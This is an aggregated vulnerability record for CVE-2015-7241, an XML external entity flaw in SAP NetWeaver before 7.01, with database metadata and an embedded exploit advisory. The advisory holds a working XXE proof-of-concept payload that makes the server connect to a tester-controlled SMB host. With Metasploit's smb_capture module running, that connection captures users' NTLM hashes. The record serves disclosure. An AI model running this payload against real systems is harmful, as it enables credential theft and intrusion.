ID

VAR-E-201509-0134


CVE

cve_id:CVE-2015-7241

Trust: 2.4

sources: BID: 76809 // PACKETSTORM: 133627 // EXPLOIT-DB: 38261 // EDBNET: 59376

EDB ID

38261


TITLE

SAP NetWeaver < 7.01 - XML External Entity Injection - XML webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38261

DESCRIPTION

SAP NetWeaver < 7.01 - XML External Entity Injection. CVE-2015-7241CVE-118691 . webapps exploit for XML platform

Trust: 0.6

sources: EXPLOIT-DB: 38261

AFFECTED PRODUCTS

vendor:sapmodel:netweaverscope:ltversion:7.01

Trust: 1.6

vendor:sapmodel:netweaver xml external entityscope: - version: -

Trust: 0.5

vendor:sapmodel:netwaverscope:eqversion:7.0

Trust: 0.3

vendor:sapmodel:netweaverscope:neversion:7.01

Trust: 0.3

sources: BID: 76809 // PACKETSTORM: 133627 // EXPLOIT-DB: 38261 // EDBNET: 59376

EXPLOIT

Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===================

SAP Netwear : <7.01

Vendor advisories (only for customers):
===================
External ID : 851975 2014
Title: XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P

Description :
=============
XML External Entity Injection vulnerability has been found in the XML
parser in the System

Administration->XML Content and Actions -> Import section.

Vulnerabilities :
*****************

XML External Entity Injection :
======================

Example show how pentester is able to get NTLM hash of application's user.

Content of file (PoC) :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>
<root/>

When pentester has metasploit smb_capture module run, then application
will contatc him and provide

NTLM hash of user.

Contact :
=========

Lukasz[dot]Miedzinski[at]gmail[dot]com

Trust: 1.0

sources: EXPLOIT-DB: 38261

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38261

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38261

TYPE

XML External Entity Injection

Trust: 1.6

sources: EXPLOIT-DB: 38261 // EDBNET: 59376

TAGS

tag:exploit

Trust: 0.5

tag:xxe

Trust: 0.5

sources: PACKETSTORM: 133627

CREDITS

Lukasz Miedzinski

Trust: 0.6

sources: EXPLOIT-DB: 38261

EXTERNAL IDS

db:NVDid:CVE-2015-7241

Trust: 2.4

db:EXPLOIT-DBid:38261

Trust: 1.6

db:EDBNETid:59376

Trust: 0.6

db:PACKETSTORMid:133627

Trust: 0.5

db:BIDid:76809

Trust: 0.3

sources: BID: 76809 // PACKETSTORM: 133627 // EXPLOIT-DB: 38261 // EDBNET: 59376

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2015-7241

Trust: 2.1

url:https://www.exploit-db.com/exploits/38261/

Trust: 0.6

url:https://help.sap.com/nw_platform

Trust: 0.3

url:https://service.sap.com/sap/support/notes/https://service.sap.com/sap/support/notes/2098608

Trust: 0.3

url:http://seclists.org/bugtraq/2015/sep/85

Trust: 0.3

sources: BID: 76809 // PACKETSTORM: 133627 // EXPLOIT-DB: 38261 // EDBNET: 59376

SOURCES

db:BIDid:76809
db:PACKETSTORMid:133627
db:EXPLOIT-DBid:38261
db:EDBNETid:59376

LAST UPDATE DATE

2022-07-27T09:42:37.164000+00:00


SOURCES UPDATE DATE

db:BIDid:76809date:2015-09-21T00:00:00

SOURCES RELEASE DATE

db:BIDid:76809date:2015-09-21T00:00:00
db:PACKETSTORMid:133627date:2015-09-21T12:11:11
db:EXPLOIT-DBid:38261date:2015-09-22T00:00:00
db:EDBNETid:59376date:2015-09-22T00:00:00